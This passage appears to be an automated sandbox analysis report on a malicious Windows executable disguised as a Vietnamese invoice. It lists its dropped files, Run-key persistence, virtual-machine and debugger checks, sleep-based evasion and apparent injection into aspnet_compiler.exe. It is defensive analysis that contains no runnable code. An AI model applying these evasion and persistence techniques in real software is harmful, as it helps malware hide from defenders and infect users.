Source: Shhejayly.exe.0.dr, Form1.cs .Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.180000.0.unpack, Form1.cs .Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: Cuhcxlcg[1].exe.12.dr, Form1.cs .Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: dwn.exe.12.dr, Form1.cs .Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 17.0.dwn.exe.ae0000.0.unpack, Form1.cs .Net Code: Void System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Code function: 0_2_077E357F push esi; retf 0_2_077E3582
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Code function: 0_2_077E3DAE push ds; ret 0_2_077E3DBA
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Code function: 0_2_077EAC8A push E8000001h; retf 0_2_077EAC91
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_10002806 push ecx; ret 12_2_10002819
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0044E002 push edx; retf 14_2_0044E07A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0044E002 push edx; retf 14_2_0044E0BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0044E0C8 push edx; retf 14_2_0044E0CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0044E0B4 push edx; retf 14_2_0044E0BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0044E0B0 push eax; retf 14_2_0044E0B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0044E144 push ebp; iretd 14_2_0044E146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0044E148 push esp; iretd 14_2_0044E152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0044E17C push ecx; retf 14_2_0044E142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0044E130 push edi; retf 14_2_0044E136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0044E138 push ecx; retf 14_2_0044E142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0044E1C4 push eax; retf 14_2_0044E1C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0044693D push ecx; ret 14_2_0044694D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0044DB70 push eax; ret 14_2_0044DB84
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0044DB70 push eax; ret 14_2_0044DBAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_00451D54 push eax; ret 14_2_00451D61
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 14_2_004044A4
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Static PE information: 0xB7B87B95 [Sun Sep 4 00:13:09 2067 UTC]
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe File created: \y#u00eau c#u1ea7u b#u00e1o gi#u00e1 inv20230104-vn.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\Cuhcxlcg[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe File created: C:\Users\user\AppData\Local\Temp\dwn.exe
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe File created: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Shhejayly
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe TID: 868 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe TID: 5128 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5160 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 5392 Thread sleep count: 44 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 14_2_0040DD85
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9489
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: dwn.exe, 00000011.00000002.561697222.0000000004345000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SQEMU\[_EbDU
Source: aspnet_compiler.exe, 0000000C.00000002.524221761.0000000001367000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oy
Source: Shhejayly.exe, 00000012.00000002.567010928.0000000006EEC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: Shhejayly.exe, 00000012.00000002.528271926.00000000007FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: aspnet_compiler.exe, 0000000C.00000002.524221761.0000000001367000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWt
Source: aspnet_compiler.exe, 0000000C.00000002.525361039.000000000137D000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.355610378.0000000001377000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Shhejayly.exe, 0000001C.00000002.534013224.000000000091B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
Source: Shhejayly.exe, 00000012.00000002.528271926.00000000007FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.353332001.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.528271926.00000000007FF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: aspnet_compiler.exe, 0000000C.00000002.524221761.0000000001367000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\oy
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_00418981 memset,GetSystemInfo, 14_2_00418981
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 12_2_100010F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_10006580 FindFirstFileExA, 12_2_10006580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0040AE51 FindFirstFileW,FindNextFileW, 14_2_0040AE51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 14_2_0040DD85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 14_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 14_2_004044A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_10004AB4 mov eax, dword ptr fs:[00000030h] 12_2_10004AB4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_10002639 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_10002639
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_1000724E GetProcessHeap, 12_2_1000724E
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe Memory allocated: page read and write | page guard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_10002639 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_10002639
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_100060E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_10002B1C

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Section loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe protection: execute and read and write
